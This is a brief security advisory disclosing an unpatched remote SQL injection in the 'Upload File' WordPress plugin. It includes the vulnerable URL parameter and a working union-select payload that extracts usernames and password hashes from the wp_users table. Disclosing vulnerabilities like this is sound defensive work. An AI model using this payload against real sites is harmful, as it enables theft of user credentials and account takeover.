wpupload-sql.txt

`New Advisory:  
Wordpress Plugin Upload File(UP) Remote SQL Injection  
  
  
--------------------Summary----------------  
Software: Upload File (WordPress Plugin)  
Critical Level: Moderate  
Type: SQL Injection  
Class: Remote  
Status: Unpatched  
PoC/Exploit: Not Available  
Solution: Not Available  
Discovered by: eserg.ru  
  
-----------------Description---------------  
1. SQL Injection.  
  
http://localhost/[path]/wp-uploadfile.php?f_id=[SQL]  
SQL query:  
null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*  
  
--------------PoC/Exploit----------------------  
Waiting for developer(s) reply.  
  
--------------Solution---------------------  
No Patch available.  
  
--------------Credit-----------------------  
Regards,  
Belsec Team  
http://eserg.ru  
`